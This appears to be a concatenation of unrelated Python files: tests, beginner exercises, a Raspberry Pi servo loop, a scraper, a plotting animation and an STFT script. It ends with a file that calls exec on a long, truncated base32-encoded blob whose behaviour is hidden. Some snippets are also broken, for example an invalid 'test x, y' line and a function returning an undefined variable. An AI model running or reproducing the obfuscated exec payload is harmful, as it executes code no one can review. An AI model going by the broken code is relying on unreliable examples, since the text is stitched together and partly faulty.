n1 = templates.gaussian_templates(wave, centers=centers, widths=widths,
norm=True)
assert(np.allclose(n1.shape, (NW, NG)))
assert(np.allclose(n1.max(), 1./norm, rtol=1.e-4))
assert(np.allclose(n1.sum(), NG, rtol=1.e-4))
return True
def test_bspline_templates():
"""
templates.bspline_templates
"""
wave = np.arange(5000., 6000.)
NW = len(wave)
df=6
for df in [6, 8, 12]:
for log in [True, False]:
spl = templates.bspline_templates(wave, degree=3, df=df,
get_matrix=True, log=log,
clip=0.0001, minmax=None)
assert(np.allclose(spl.shape, (NW, df)))
assert(np.allclose(spl.sum(axis=1), 1., rtol=1.e-4))
spt = templates.bspline_templates(wave, degree=3, df=df,
get_matrix=False, log=log,
clip=0.0001, minmax=None)
assert(len(spt) == df)
keys = list(spt.keys())
for i, k in enumerate(keys):
templ = spt[k]
assert(np.allclose(templ.wave, wave))
assert(np.allclose(spl[:,i], np.squeeze(templ.flux)))
|
# Define a function that takes an argument. Call the function. Identify what code is the argument and what code is the parameter.
def sentence(st):
# Convert the arguement to a string parameter.
convertedToString = str(st)
# Get parameter length
strLength = len(convertedToString)
# Check if parameter(converted string) already ends with the puntuation period.
# If no, then add period at end of sentence.
if convertedToString.endswith('.'):
correctSentence = convertedToString.capitalize()
else:
correctSentence = convertedToString.capitalize() + '.'
# Finally print our not perfect grammar sentence.
print(correctSentence)
# Call your function from Example 1 three times with different kinds of arguments: a value, a variable, and an expression.
# Identify which kind of argument is which.
# Call sentence function with value
sentence("today weather is so cold")
# Call sentence function with variable
dressing = "You should dress properly with a coat, scarf, socks, and boots."
sentence(dressing)
# Call sentence with an expression
otherwise = "If not,"
sentence(otherwise + "you risk getting sick sooner!")
# Create a function with a local variable. Show what happens when you try to use that variable outside the function.
# Explain the results.
def onlyLocalVariable():
_local = "I exist only within these walls"
print(_local)
#print(_local
#Traceback (most recent call last):
# File "/Users/ericel123/Documents/UoPeople/python 101/discussion2.py", line 39, in <module>
# print(_local)
#NameError: name '_local' is not defined
# Create a function that takes an argument. Give the function parameter a unique name.
# Show what happens when you try to use that parameter name outside the function. Explain the results.
def uniquParameter(uopeople):
print(uopeople)
#print(uopeople)
#Traceback (most recent call last):
# File "/Users/ericel123/Documents/UoPeople/python 101/discussion2.py", line 52, in <module>
# print(uopeople)
#NameError: name 'uopeople' is not defined
# Show what happens when a variable defined outside a function has the same name as a local variable inside a function.
# Explain what happens to the value of each variable as the program runs.
_global = 4
def sameGlobalLocalVariable():
#_global = 3
print(_global)
print(_global)
sameGlobalLocalVariable()
print(_global)
#4
#3
def func(james): # James = parameter
print("Hi james") #Hi James = the argument
return message;
func('hi James')
|
import RPi.GPIO as GPIO
import time
'''
Front Wheel control left and right.
====> 50HZ
0° ---- 0.5ms ---- 2.5%
45° ---- 1.0ms ---- 5.0%
90° ---- 1.5ms ---- 7.5%
135° ---- 2.0ms ---- 10.0%
180° ---- 2.5ms ---- 12.5%
Red ---- +5V ---- GPIO.2
Brown ---- GND ---- GPIO.6
Yellow ---- SIG ---- GPIO.12
'''
# Front Wheel
SIG = 12
# BOARD or BCM
GPIO.setmode(GPIO.BOARD)
GPIO.setup(SIG, GPIO.OUT)
car = GPIO.PWM(SIG, 50) # 50HZ
car.start(0)
if __name__ == '__main__':
try:
while True:
for i in range(5, 11, 1):
car.ChangeDutyCycle(i)
print(i)
time.sleep(0.5)
for i in range(10, 4, -1):
car.ChangeDutyCycle(i)
print(i)
time.sleep(0.5)
except KeyboardInterrupt:
car.ChangeDutyCycle(7.5)
time.sleep(1)
car.stop()
GPIO.cleanup()
print('Exit...')
|
#!/usr/bin/python3.4
# -*-coding:Utf-8
test x, y : (x * x) + (y * y)
f = test(3, 2)
print(f)
|
'''
Given a string, determine if it is a palindrome, considering only alphanumeric characters and ignoring cases.
Notice
Have you consider that the string might be empty? This is a good question to ask during an interview.
For the purpose of this problem, we define empty string as valid palindrome.
Example
"A man, a plan, a canal: Panama" is a palindrome.
"race a car" is not a palindrome.
'''
class Solution:
"""
@param s: A string
@return: Whether the string is a valid palindrome
"""
def isPalindrome(self, s):
# write your code here
#sL = s.lower()
length = len(s)
if length < 2:
return True
start =0; end = length -1;
while start < end:
strStart = s[start].lower(); strEnd = s[end].lower();
if self.isAlphanumeric(strStart) == False:
start += 1
#print( "strstart1 is ", strStart)
continue;
#print( "strstart2 is ", strStart)
if self.isAlphanumeric(strEnd) == False:
end -= 1 ;
continue;
print("start and end is ", start, end)
print("strStart and strEnd", strStart, strEnd)
if ( strStart == strEnd ):
start+=1;
end -= 1;
else:
return False;
print("last start and end",start, end);
print(s[start],s[end])
if s[start].lower() == s[end].lower():
return True;
else:
return False;
def isAlphanumeric(self, data):
res = False;
if ((data <= 'z' and data >= 'a') or (data <= '9' and data >= '0')):
res = True;
else:
res = False;
#print("data and res ",data, res)
return res;
data = "A man, a plan, a canal: Panama "
data='aa'
print("data is ", data)
mySol = Solution()
res = mySol.isPalindrome(data)
print("res is ",res)
|
#!/usr/bin/python3
''' Module with lookup function'''
def lookup(obj):
"""
Return list with dictionary of the class
"""
return list(dir(obj))
|
"""function to buggy"""
"""calculation "x-1/x"""
def buggyfunc(x):
y = x
for i in range(x):
y = y-1
z = x/y
return z
buggyfunc(20)
|
#
# (C) 2013 Varun Mittal <varunmittal91@gmail.com>
# JARVIS program is distributed under the terms of the GNU General Public License v3
#
# This file is part of JARVIS.
#
# JARVIS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation version 3 of the License.
#
# JARVIS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with JARVIS. If not, see <http://www.gnu.org/licenses/>.
#
from django.conf import settings
import elasticsearch
from elasticsearch import Elasticsearch, RequestsHttpConnection
is_appengine_env = True
try:
from jarvis_frontend.utilities import isDevelopmentServer
except:
is_appengine_env = False
class ElasticSearchClient:
def __init__(self):
SERVERS = getattr(settings, 'ES_HOSTS', [])
if is_appengine_env:
if isDevelopmentServer():
__servers = []
for server in SERVERS:
if 'production' in server and server['production']:
continue
__servers.append(server)
SERVERS = __servers
for server in SERVERS:
if 'use_ssl' and server['use_ssl'] == True:
url = "https://%s:%s/" % (server['host'], server['port'])
else:
url = "http://%s:%s/" % (server['host'], server['port'])
server['url'] = url
self.SERVERS = SERVERS
self.es = Elasticsearch(SERVERS)
|
import matplotlib.animation as animation
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
fig,ax = plt.subplots()
fig.patch.set_visible(False)
ax.axis("off")
def animate(i):
# fig,ax = plt.subplots()
fig.patch.set_visible(False)
ax.axis("off")
#================Calls table==========================
df = pd.read_csv("Call_Max_OI.csv")
df1= pd.read_csv("Call_Max_negchnginOI.csv")
df2= pd.read_csv("Call_Max_poschnginOI.csv")
df3= pd.read_csv("Call_Max_volume.csv")
df.update(df.select_dtypes(include=np.number).applymap('{:,}'.format))
df1.update(df1.select_dtypes(include=np.number).applymap('{:,}'.format))
df2.update(df2.select_dtypes(include=np.number).applymap('{:,}'.format))
df3.update(df3.select_dtypes(include=np.number).applymap('{:,}'.format))
# df['OI'] = df['OI'].map('{:,.2f}'.format)
fig.tight_layout()
colors = plt.cm.PuBuGn(np.linspace(0.1, 0.9, len(df)))
ax.text(0.00690061, 0.860942, "Calls:-",size=35)
ax.text(0.00690061, 0.386018, "Puts:-",size=35)
tab1 = ax.table(cellText=df.values, colLabels=df.columns,
cellLoc='center',colColours=colors,bbox=[0.00690061, 0.568072, 0.2, 0.2])
tab2 = ax.table(cellText=df1.values, colLabels=df1.columns,
cellLoc='center',colColours=colors,bbox=[0.248842, 0.568072, 0.2, 0.2])
tab3 = ax.table(cellText=df2.values, colLabels=df2.columns,
cellLoc='center',colColours=colors,bbox=[0.493855, 0.568072, 0.2, 0.2])
# tab2.scale(3,1.5)
tab4 = ax.table(cellText=df3.values, colLabels=df3.columns,
cellLoc='center',colColours=colors,bbox=[0.742709, 0.568072, 0.2, 0.2])
tab1.auto_set_font_size(False)
tab1.set_fontsize(11)
tab2.auto_set_font_size(False)
tab2.set_fontsize(11)
tab3.auto_set_font_size(False)
tab3.set_fontsize(11)
tab4.auto_set_font_size(False)
tab4.set_fontsize(11)
#===================Puts table============================
f = pd.read_csv("Put_Max_OI.csv")
f1= pd.read_csv("Put_Max_negchnginOI.csv")
f2= pd.read_csv("Put_Max_poschnginOI.csv")
f3 = pd.read_csv("Put_Max_Vol.csv")
f.update(f.select_dtypes(include=np.number).applymap('{:,}'.format))
f1.update(f1.select_dtypes(include=np.number).applymap('{:,}'.format))
f2.update(f2.select_dtypes(include=np.number).applymap('{:,}'.format))
f3.update(f3.select_dtypes(include=np.number).applymap('{:,}'.format))
tab5 = ax.table(cellText=f.values, colLabels=f.columns,
cellLoc='center',colColours=colors,bbox=[0.00690061, 0.0714286, 0.2, 0.2])
tab6 = ax.table(cellText=f1.values, colLabels=f1.columns,
cellLoc='center',colColours=colors,bbox=[0.248842, 0.0714286, 0.2, 0.2])
# tab2.scale(3,1.5)
tab7 = ax.table(cellText=f2.values, colLabels=f2.columns,
cellLoc='center',colColours=colors,bbox=[0.493855, 0.0714286, 0.2, 0.2])
tab8 = ax.table(cellText=f3.values, colLabels=f3.columns,
cellLoc='center',colColours=colors,bbox=[0.742709, 0.0714286, 0.2, 0.2])
tab5.auto_set_font_size(False)
tab5.set_fontsize(11)
tab6.auto_set_font_size(False)
tab6.set_fontsize(11)
tab7.auto_set_font_size(False)
tab7.set_fontsize(11)
tab8.auto_set_font_size(False)
tab8.set_fontsize(11)
# ax.annotate(f"Calls:-",
# xy=(0.00690061, 0.939683), xytext=(0, 10))
# xycoords=('axes fraction', 'figure fraction'),
# textcoords='offset points',
# size=20, ha='center', va='bottom',color = 'g')
# plt.subplots_adjust(left=0.2, bottom=0.2)
# tab2.auto_set_column_width(col=list(range(len(df.columns))))
# props=tab2.properties()
# print(props)
ani = animation.FuncAnimation(fig, animate, interval=1000)
plt.show()
|
#! /usr/bin/python3
import codecs
import html.parser
import re
import sqlite3
import urllib.request
class SifParser(html.parser.HTMLParser):
def __init__(self):
super().__init__()
self._tag = [None]
self._table = None
self._record = None
self._records = None
self._data = None
self._rowspan = None
# database
self._db = sqlite3.connect('sif.db')
c = self._db.cursor()
c.execute('DROP TABLE IF EXISTS member')
c.execute(
'CREATE TABLE member('
'_no INTEGER NOT NULL PRIMARY KEY, '
'img VARCHAR(255), '
'name VARCHAR(255) NOT NULL, '
'type VARCHAR(7) NOT NULL, '
'stamina INTEGER, '
'smile INTEGER, '
'pure INTEGER, '
'cool INTEGER, '
'max_stamina INTEGER, '
'max_smile INTEGER, '
'max_pure INTEGER, '
'max_cool INTEGER, '
'final_max_stamina INTEGER, '
'final_max_smile INTEGER, '
'final_max_pure INTEGER, '
'final_max_cool INTEGER, '
'skill VARCHAR(255), '
'center_skill VARCHAR(255), '
'rarity INTEGER NOT NULL'
')')
self._db.commit()
c.close()
def appendData(self, data):
if (len(self._data) == 0):
self._data = data
elif (len(data) > 0):
self._data = '%s,%s' % (self._data, data)
def appendRowspan(self):
while len(self._record) in self._rowspan.keys():
rowspan = self._rowspan[len(self._record)]
self._record.append(rowspan[1])
rowspan[0] -= 1
if (rowspan[0] == 0):
rowspan = None
self._rowspan.pop(len(self._record) - 1)
def insertRecord(self):
query = None
if (self._table == 'N'):
query = (
'INSERT INTO member (_no, img, name, type, stamina, smile, pure, cool, final_max_stamina, final_max_smile, final_max_pure, final_max_cool, rarity) '
'VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)')
else:
query = (
'INSERT INTO member '
'VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)')
c = self._db.cursor()
for record in self._records:
c.execute(query, record)
self._db.commit()
c.close()
def handle_starttable(self):
self._rowspan = {}
self._records = []
def handle_endtable(self):
self.insertRecord()
self._table = None
self._rowspan = None
self._records = None
def handle_starttr(self):
self._record = []
def handle_endtr(self):
# check trailing rowspan
self.appendRowspan()
# the first column should be number
if (self._record[0] != None) and (self._record[0].isdigit()):
self._record.append({
'N' : 1,
'R' : 3,
'SR' : 5,
'UR' : 7
}.get(self._table, None))
self._records.append(tuple(self._record))
self._record = None
def handle_starttd(self, attrs):
self._data = ''
colspan = None
# append data for rowspan
self.appendRowspan()
# check colspan and rowspan
for attr in attrs:
if (attr[0] == 'colspan'):
colspan = int(attr[1])
elif (attr[0] == 'rowspan'):
self._rowspan[len(self._record)] = [int(attr[1]) - 1, None]
if (colspan != None):
for i in range(1, colspan):
self._record.append(None)
def handle_endtd(self):
# record for rowspan
if len(self._record) in self._rowspan.keys():
rowspan = self._rowspan[len(self._record)]
if (rowspan[1] == None):
rowspan[1] = self._data
if (len(self._data) == 0):
self._data = None
self._record.append(self._data)
self._data = None
def handle_starttag(self, tag, attrs):
self._tag.append(tag)
if (self._table != None):
if (tag == 'table'):
self.handle_starttable()
if (tag == 'tr'):
self.handle_starttr()
elif (tag == 'td'):
self.handle_starttd(attrs)
def handle_endtag(self, tag):
self._tag.pop()
if (self._table != None):
if (tag == 'table'):
self.handle_endtable()
elif (tag == 'tr'):
self.handle_endtr()
elif (tag == 'td'):
self.handle_endtd()
def handle_startendtag(self, tag, attrs):
if (self._record != None) and (tag == 'img'):
for attr in attrs:
if (attr[0] == 'src'):
self.appendData(attr[1])
def handle_data(self, data):
data_ = data.strip(' \r\n\t')
if (self._tag[-1] == 'h2'):
m = re.match(r'\[(\w+)\]部員', data_)
if (m != None):
self._table = m.groups()[0]
elif (self._record != None):
tags = ('td', 'a', 'strong', 'span')
if self._tag[-1] in tags:
if (data_ == '-'):
data_ = ''
self.appendData(data_)
body = None
try:
f = open('member.txt', 'r')
body = f.read()
print('page read from file')
f.close()
except:
res = urllib.request.urlopen('http://www56.atwiki.jp/bushimolovelive/pages/30.html')
body = codecs.decode(res.read())
print('page loaded, write to file')
f = open('member.txt', 'w')
f.write(body)
f.close()
parser = SifParser()
print('start to parse')
parser.feed(body)
|
import numpy as np
import matplotlib.pyplot as plt
import math
import csv
import sys
args = sys.argv
data_axis, data_value = np.loadtxt(
"./"+args[1]+".csv", delimiter=',', unpack=True)
#読み込んだ信号の長さ
data_size=len(data_value)
#信号を256個ずつ区切る
r=256
#切り出した信号の個数
M=int(data_size/256)
print("Mは、{}".format(M))
#長さ256の短時間フーリエ変換がM個並んでいる
X_r=[[0 for i in range(r)] for j in range(M)]
X_i=[[0 for i in range(r)] for j in range(M)]
for m in range(M):
for k in range(r):
for r_i in range(r):
#data_valueから取り出す信号は0~data_sizeで考える
index=m*r+r_i
X_r[m][k] += data_value[index] * math.cos(2 * math.pi * k * index / r)
X_i[m][k] += (-1) * data_value[index] * math.sin(2 * math.pi * k * index / r)
#DFTの値は左右対称となるため、128次元めまでを考えれば良い
vecSize=int(r/2)
#対数パワースペクトルを求める
O=[[0 for i in range(vecSize)] for j in range(M)]
for m in range(M):
for k in range(vecSize):
O[m][k]=math.log(X_r[m][k] * X_r[m][k] + X_i[m][k] * X_i[m][k])
#0次元目の値を捨てる
for m in range(M):
del O[m][0]
#対数パワースペクトルを書き出し
with open(args[1]+'_O.csv', 'w') as f:
writer = csv.writer(f)
writer.writerows(O)
#正規分布を求める
#平均値ベクトルmyu,共分散行列の対角要素sigmaを求め、書き出す
myu=[0] * (vecSize-1)
for k in range(vecSize-1):
for m in range(M):
myu[k]+=O[m][k]
myu[k]=myu[k]/M
with open(args[1]+'_myu.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(myu)
sigma=[0] * (vecSize-1)
for k in range(vecSize-1):
for m in range(M):
sigma[k]+=(O[m][k]-myu[k])*(O[m][k]-myu[k])
sigma[k]=sigma[k]/M
with open(args[1]+'_sigma.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(sigma)
|
import base64
exec(base64.b32decode("EMWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWQUIZAJ5RGM5LTMNQXIZJAIJ4SAU3BPJ4HIICUNBQW423TEBKG6ICCNRQWG2ZAINXWIZLSEBBXE5LTNAFCGIDHNF2GQ5LCEAQDUIDIOR2HA4Z2F4XWO2LUNB2WELTDN5WS6U3BPJ4HIL3DN5WXUCRDEBTHE33NEBGGS3TVPAFCGIDMN5RWC3DIN5ZXIIB2EBQWC4TDNA3DICRDEBVWK6JAHIQHGYL2FVQU6NDXKI2WMRJTPJIDG5CRG4FCGIDEMF2GKIB2EBJXK3RAKNSXAIBAGYQDEMB2GMZTUMBZEAZDAMRQBIRS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2CTJNVYG64TUEBWWC4TTNBQWYCTFPBSWGIDNMFZHG2DBNQXGY33BMRZSQJ3DLR4DAMC4PAYDAXDYGAYFY6BQGBOHQMBQLR4DAMC4PAYDAXDYGAYFY6BQGNOHQMBQLR4DAMC4PAYDAQC4PAYDAXDYGAYFY6BQGBZSCXDYGAYFY6BQGBOHQMBQMROHQMBQLR4DAMDELR4DAMK4PAYDA3C4PAYDAXDYGAYFUXDYGAYFY6BQGBSVY6BQGBOHQMBQNJOHQMBRLR4DAMDELR4DAMS4PAYDAXDYHAZVY6BQGFOHQMBQMROHQMBRLR4DAMC4PAYDIVLELR4DAMK4PAYDAUZILR4DAM24PAYDAXDYGAYFY6BQGBUVY6DGMZOHQZTGLR4GMZS4PBTGMTTTLR4DCY24PAYTOXDYGAYFY6BQGB4FY6BZMNKVW22DLR4GINCILR4GIM24PBTGIXDYMJSVY6DCMZOHQMBSLR4DSN2HLR4GIMK4PBSTKXDYMQYUSJS4PA4TSXDYME2FY6BYGMVVY6DBGNOHQYJSLR4GCMS4PBSWKKS4PBSGKXDYGEYC6XDYMEZVY6DCGNEV6XDYHAYEOXDYMI4VY6BQHAUFY6BQGNOHQMDDLR4GMM24PBSGEXDYMRTD4VK4PBQTOXDYHE4X2PZAIMTFY6DFHFOHQYLFLR4GCZK4PBRWEXDYME4VGVLROFOHQZJRLR4GGOK4PBRTCXDYMY3VY6BYGNOHQZBTLR4DQNK4PBSWIXDYMRSFY6BZGNOHQOLELR4DSZS4PBSGIXDYMMZFY6DDMFOHQYZSLR4GGZK4PBRTSXDYMM4VY6DFGFOHQZRRJJOHQYLGLR4GCN24PAYTOXDYMVSVY6DEHBOHQOBTLR4GEZC4PBSGKXDYMRRFY6DGGZ6HEXDYMQZFY6BYMJOHQOLGLR4GGZK4PA3WMW24LQ5VY6DEHA5VY6DEMNOHQZTELR4GKZK4PAYTOXDYGFSVY6BZMUWVY6DDHBOHQZJVLR4GIZS4PAYTMX24PA4WGLK4PBRGGXDYMYZVY6DFMRPHYXDYMY2FY6DFGFOHQZRXLR4GINT6LNMDW4C4PBTGK2DBLR4GKZC4PBSTQXDYMU3VY6DGGFOHQY3FN5OHQYTCPNOHQOBXLR4DAN2HLQTVY6BQMJOHQZJXLR4GIZTXLR4GEYS4PBSGMXDYMZRVY6DDGROHQZDCLR4DSYS4PBTDQ5C4PBRTOXDYMY4VY6DCHBOHQZBWLR4GKMK4PA4TCPZ6LR4GEZK4PBRDSNC4PAYTSTK4PAYWCXDYMZRFY6DFGVOHQZBTLR4DQYS4PBSDGXDYMQYVY6DDGROHQMJXLR4GINLILR4DSMS4PBTDOR24PA4TGXDYMNSVY6DDGY7VY6DFMFOHQYLELR4GIMJELR4DSOC4PBRGIO24PBQTGXDYHA4W2XDYMZRWQXDYHEZFY6BRGVOHQZJXLR4GMMKTOVOHQMJWLR4GEZS4PBSTSXDYMUZFY6BRMRXDI2K4PBSGIXDYG5TFY6DFMVOHQYZXLR4GMYSLLR4GMZS4PBTDARS4PBRGGXDYMUYG6XDYMM3FY6DEMJOHQZRTPBOHQYRVLR4DQYK4PBTGMXDYGA2FY6DGG5SDCXDYMRSVY6DFGVOHQYLBNFOHQYTDLR4DAMKPLR4GEYS4PBRDQXDYMIZFY6BYMIVVY6DCG4QVY6DGMVOHQODFH5MVY6DGMNOHQYTCNNOHQZJTLR4GINSYLR4GCYS4PA4WCPS4PBSWMXDYHBTFY6DGGZOHQZJTLJWVY6BRGZOHQZTGLR4GKYK4PBTDIXDYGFRFY6DGMNOHQYRUNVOFYXDYMFRFY6DDGMRXCXDYHA4VY6DEGZOHQYZULR4GIYTLLR4GGOC4PAYTIXDYG5TFY6DGMF5FY6BRMROHQODGLR4GKYS4PA4TEL2HLR4DCM2TLR4GKYSFPEQFY6BZMUQFY6DFGBOCOXDYMRSVY6DFGBOHQYLCLR4GGM24PA4TKXDYMY4FY6DBMROHQMLCLR4GGNR7HVSFY6BYMJOHQZJXLR4DQOC4PBRDOXDYMU3ECXDYMQ3VY6DDMFOHQYRQMZOHQOJYLR4GGNS4PBSDGXDYHA2UMXDYMVTFY6DDGBBFY6DDMVOHQODELR4GEZTOLR4DQYZGOVOHQYTDLR4GGOKCLR4GCYK4PBTDAZK4PA4DMXDYGFRH44S4PA4GIXDYMZSVY6DBGVOHQYLFLR4DSZS4PBRTO4ZULR4GKMJAIBPSUXDYGBSVY6DBMVNEUXDYGEZFY6DFMNOCOXDYMY4VY6BZMFOHQZRSLR4DCNDYLR4GMOC4PBSWKXDYG5TFY6DFGMSVY6BYHAYFAUK4LRYVQXDYMU4D4XDYMJSVY6DDGFOHQY3ELR4DCMC4PA4DMXDYMJQWSXDYMY2HGXDYMMYFY6BZMRYUKXDYGAZVSXDYHBQVY6BZMUVFY6DCGBOHQOBTLR4DSY24PBQTCXDYME3U6NTOL5OHQYLGPBOHQODCLR4DAYS4PA3WMXDYMYZFY6DCHFDFY6BXMZOHQYJQGREFY6DFG5OHQZRYLR4GEYS4PBQWI5K4PA4DSXDYHEYFY6DGGE3VY6DFMZOHQZRVOFOHQMLGLR4DCYS4PBTDIXDYGA3VY6BZGJAVY6DEMVOHQYTDLR4GIMC4PAYTGXDYMI2VY6DEGRVXANS4PBQWCXDYMEYFY6DGGFOHQYRXLR4GKN3KLR4GGNS4PBRGKXDYHAYXWXDYMUZVY6DEGFOHQYLFLR4GIMBFPVOHQYTDLR4GINTBLR4GGYS4PBQTQXDYMEZHM4C4PBRDANK4PA4TM3KDLR4GKZTSLR4DSNZ2LR4GCY2PLR4GGZK4PA4TEXDYHEYFY6BYG5OHQZRRLR4GCYSOJ4UDWXDYMY3V6XDYMU4XUWC4PBSGEXDYMM2VY6BQMJOHQYRZLR4DSYS4PBSWMZ22LR4GCYK4PBRTSXDYMJTFY6DFG5OHQZDELR4GGZDIKROHET3VLR4GEN24PBRTAXDYGAZVY6DDMFAVY6DBGFOHQMLGLR4GIOC4PAYDEXDYMRSSMW24PBRTMXDYMNSFY6DCMEZC4YK4PA4DOK3XMFOHQYLFLR4GCMK4PBSWKXDYGBRE2XDYMJRG4T3PJZOHQYZXLR4GCZS4PBRTGXDYMQ3XQXDYME3VY6DEMZOHQYTGHNOHQMLELR4DCZC4PBRTKXDYMFRFY6DEMQQVY6DEMNOHQYJVLR4GCM24PBRGCXDOLR4GKY24PBTDAXDYMZRVY6DGMROHQZRQLR4DCN24PBRTEXDYGAYFY6BYMJOHQN3GLR4GEYS4PBQWKXDYHA3FY6DCGJQVY6BRMYXFY6BRMY7XQXDYMQ2VY6DCGBOHEXDYMM3VY6BZGR6VY6DEGBOHQZJTLR4DQM24PBTDCXDYHBTDYZ2MPBOHQMLFLR4GCNS4PBQTGXDSFQSFY6BYHFFVY6DCGROHQZRQLR4GKY3CLR4GENKCLR4GEOC4PBSWIX2EIFOHQODDLR4DQNS4PAYDMXDYGE3DAOK4PBQTKXDYMU4HIMLILR4GCOC4PBRWEV24PBSTCXDYGFSHCXDYMU2VMXDYMRSFY6DCMFOHQODCLR4DQZS4PAYWCXDYMFRVY6DEHBOHQOLEIFOHQZTGLR4GCM2RKROHQYJZIVOFYQK4PBSTCXDYMYYVY6DCG5OHQZLGLR4GCYTFIVIVY6DGMROHQMJYLR4GKNJBFJOHQYJWLR4GENK4PBTDOXDYMUZFY6BRGVOHQZDDGVMEMXDYMY4FY6DGMROHQYJTLZOHQZBRGZOHQZDDLR4GEOC4PA4DQXDYMZSVY6DFMNOHQMLBLR4DANC4PBSWC424PBSGIXDYMRQVY6DDGRKTEXDYMY4FY6DCGZOHQOLGLR4GKMJQJ5OHQZBUMNOHQMLBLR4GCYTSLR4GKNC4PAYTAXDYMIYH4XDYMI4FY6BYGNKVY6BQMVOHQZJRLR4DANRNLR4GMY24PAYWIIDDLR4DSZS4PAYWMXDYMYZVY6BRMNOHQMBTLR4DCNK4PBRGEXDYHA2VY6DCG4QFY6DEGBOHQZRSOFOHQYTDLR4GIYS4PBSWGXDYMFRWYIK4PBSTEXDYMJTFY6DDGRNVY6DCGNOHEXDYMI4DANSGLR4GGOC4PBRDQKS4PAYWCOS4PBSWEXDYMRSVY6DDGZOHQYJXLR4GKMRBMFOHQODGLR4GCNR6LR4GIZC4PBRTGMJPLR4GENS4PBTDAXDYGA2VY6DGMNOHQYLGKROHQYZXNFOHQZDBLR4GGZTSOJOHQZBVMVOHQMBVN5OHQOBXJRLDMXDYHBRSUXDYGBSVY6BRGJOHQYTCLR4DCZTBLR4DAY24PBRTQVSBLR4GGNK4PBRGKXDYMZRFY6BRHFOHQZLELR4GIY24PBSTEXDYGEYD4XDYG5TFY6DCGNOHQMJZN5OHQMJVLR4GIZC4PBRGKXDYMMYVY6BYG5OHQYJYLR4GGMDGLR4GEMCHKNOHQYZUMVOHQOLCLR4GMY2ULR4DSN24PAYGGXDYMRSCWXDYMI2WMXS4PA4GMXDYHBSVY6DCGZOHQZBVLR4GMM24PBRDCXDYMI4FY6DDGERVY6DGGA6VY6DGGFOHQOBVFBCG4VC4PBSWMXDYGFSCA3C4PBTDAXDYMY2SEXDYMZQWAW24PBQWCXDYMI3TKXDYMYYFY6BZMJXFY6BRGBOHQYTGLR4GENC4PBSDAXDYHBQVY6DEHFWFY6DEGVOHQZBTPVOHQYLFJZOHQOBRLR4GMYS4PAYDISDRLR4DCNTTLR4GEYK4NZOCOXDYME3FY6DDGZYFY6DEGROHQZLFLR4DCYS4PA4DEXDYMVRFY6BZGRQFY6BYGFOHQYLCNVOHQZRWLR4GKM24PBSTIXDYHA4VY6BZMERFY6DDGFUWGXDYMY3FY6BRMVOHQZJSLR4GEOLFLR4GCMC4PBRDSOTFKZOHQOLGNFYFY6BZMJBFY6BQGFOHQYZSLR4DQNDTLR4DQNK2LR4DQM24PAYTGXDYMQ3G6XDYGE2FY6DGMVBDGXDYME2FY6DFGFOHQMJTLR4DQNS4PBRGEQ24PAYDEQR7LR4DCOK4PAYWMXDYHE4FY6DEGZXFCXDYMRRFY6BYGNOHQMLGLR4DAOC4PA4GGXDYMUYVY6DFGZFVY6BYMROHQMDGLR4DAM24PBSTSXDYMYZVY6DGGNOHQYRXLR4GKM24PBRDQXDYMJTHOXDYGFQVY6DFHBWVKKS4NZ5FY6DBGNIVY6DEHFOHQYRULR4GIMC4PBTDEJJPLR4GGNBPJQ2VIMC4PBRWKXDYMNSFY6BRHE6FY6DCMJOHQOBULR4GEZK4NZOHQMJVEJKC6624PA4WMVLELR4DSOCILR4GINC4PA4TEXDYG5TFAXDYMI3VY6BRG4SEIXDYMFRVY6BZGROHQYLGLR4GEOC4PA4WIXDYMQZUK424PBQTIXDYGEYVY6DGG5OHQMBWLR4GMYS4PBRGMXDYMZRVY6DBGVOHQYRWJNOHQZTBLR4GEN24PBRTKTK5LR4GCOK4PBRTSXDYGE2EIXDYGEYFY6BZGVOHQOBYLR4DCNK4PBQTA4S4PBSTQXDYMFSVCS24PAYDAXDYMY3FY6DFGI3FY6BRGR7FY6DBHBOHQYRXLR4GENS4PBQWKXDYHA3SQ6C4PA4GMXDYMQ2VY6BYMNOHQYZWOBLFY6DDMNOHQZRULR4GKZK4PBSDMXDYMUZFY6DEGROFYXDYGBSVY6DGGJOHQYRUHM4FY6DFGVOHEXDYGA2FY6DDGJPFY6DGGRQF6XDYMMZGQXDYMY2VY6DBMF7FY3SOOVSVY5C4PBSGEXDYMFSTQXDYHAZS4XDYMJQVY6DCMZOHQOJZEVOHQYTEIZOHQMLDLR4DCYZCOQXVY6DEGVOHQOJRLRZFY6DEGNOG4XDYMI2FY6BYGJOHQZJXLR4DCMC4PBRWGXDYMQYVY5C4PA4TOXDYMY3HUXDYMJRFY6BZMFOHQYJTLR4DSYS4PBSWCXDYHBSVY6DDMFJFY6BYG47TIWS4PBQWIVK4PBSTKQC4E44F6XDYGE3FY6DCG5OHQY3FMFOHQOBVHZAVY6DEHBOHQOJWLR4GGZS4PBTDCYK4PBRWCLK4PBTDG3RKKFOHQMDCLR4GMMK4PBQWE6C4PBRWGXDYMNRVY6DBMJOHQZBWOEUCQXDYGEYGCXDYHA4HA4L6LR4DQODHLR4GINLSLR4GKMS4PBTDAXDYMI4SUXDYMFTFY6BRMJOHQZDDLR4GINK4PBTDAXDYGBSVY6DEHFOHQZRUO5SVY6BQGF